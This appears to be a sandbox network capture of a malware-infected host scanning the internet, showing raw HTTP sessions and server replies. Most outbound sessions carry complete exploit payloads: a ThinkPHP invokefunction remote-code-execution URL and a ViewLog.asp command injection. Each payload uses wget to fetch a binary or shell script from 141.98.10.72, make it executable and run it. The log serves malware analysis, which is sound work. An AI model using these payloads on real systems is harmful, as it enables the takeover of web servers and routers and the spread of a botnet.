                                                        Feb 14, 2024 09:36:00.995321989 CET515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                        Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1336192.168.2.1435426112.29.230.21580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:00.791574001 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:01.166044950 CET358INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:36:00 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 213
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 64 78 2d 6c 74 2d 79 64 2d 61 6e 68 75 69 2d 68 75 61 69 6e 61 6e 2d 36 2d 32 32 33 2d 32 34 37 2d 31 30 37 2d 32 31 35 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>dx-lt-yd-anhui-huainan-6-223-247-107-215</center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1337192.168.2.144895295.112.122.5480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:00.989270926 CET55INData Raw: 53 53 48 2d 32 2e 30 2d 4f 70 65 6e 53 53 48 5f 37 2e 39 70 31 20 52 61 73 70 62 69 61 6e 2d 31 30 2b 64 65 62 31 30 75 32 0d 0a
                                                        Data Ascii: SSH-2.0-OpenSSH_7.9p1 Raspbian-10+deb10u2


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1338192.168.2.145575095.164.199.20380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:01.283500910 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:01.402618885 CET495INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:36:01 GMT
                                                        Server: Apache/2.4.52 (Ubuntu)
                                                        Content-Length: 301
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 31 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.52 (Ubuntu) Server at 127.0.1.1 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1339192.168.2.145907295.101.3.20780
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:01.361151934 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:01.558492899 CET479INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 257
                                                        Expires: Wed, 14 Feb 2024 08:36:01 GMT
                                                        Date: Wed, 14 Feb 2024 08:36:01 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 64 62 30 66 37 34 38 26 23 34 36 3b 31 37 30 37 38 39 39 37 36 31 26 23 34 36 3b 32 64 37 31 61 32 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;9db0f748&#46;1707899761&#46;2d71a26</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1340192.168.2.145247895.217.0.18980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:01.383670092 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:01.603270054 CET339INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Wed, 14 Feb 2024 08:36:01 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1341192.168.2.144176495.217.229.2980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:01.388550043 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:01.613219976 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:36:01 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1342192.168.2.145463495.46.157.20680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:01.455161095 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1343192.168.2.144323062.232.79.748080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:02.128880978 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:02.332993031 CET439INHTTP/1.1 302 Found
                                                        Location: /weblogin.htm
                                                        Content-Security-Policy: default-src 'self';frame-ancestors 'self';form-action 'self';script-src 'self' 'nonce-draytek' 'unsafe-eval';style-src 'self' 'nonce-draytek';img-src 'self' data:;connect-src 'self' *.draytek.com.tw
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 1; mode=block
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Length: 0
                                                        Date: Wed, 14 Feb 2024 08:36:01 GMT
                                                        Server: Server


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1344192.168.2.144399662.97.56.1508080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:02.136291981 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:02.349212885 CET1175INHTTP/1.1 404 Not Found
                                                        Server: Apache-Coyote/1.1
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Length: 1012
                                                        Date: Wed, 14 Feb 2024 08:36:01 GMT
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 36 2e 30 2e 33 35 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 28 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 29 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 36 2e 30 2e 33 35 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>Apache Tomcat/6.0.35 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource (/cgi-bin/ViewLog.asp) is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/6.0.35</h3></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1345192.168.2.143562894.123.41.1298080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:02.174268961 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1346192.168.2.145966294.187.103.1308080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:02.182737112 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1347192.168.2.143306831.172.77.2058080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:02.333117962 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:02.538611889 CET451INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:36:02 GMT
                                                        Server: Apache/2.4.54 (Ubuntu) mod_fcgid/2.3.9 OpenSSL/1.1.1f
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1348192.168.2.143332294.20.96.1358080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:02.624846935 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:02.916954994 CET313INHTTP/1.1 403 Forbidden
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 106
                                                        Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
                                                        Feb 14, 2024 09:36:03.791836023 CET313INHTTP/1.1 403 Forbidden
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 106
                                                        Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1349192.168.2.144319488.202.190.12180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:03.893640995 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:04.087441921 CET219INHTTP/1.1 400 Bad request
                                                        Content-length: 90
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Type: text/html
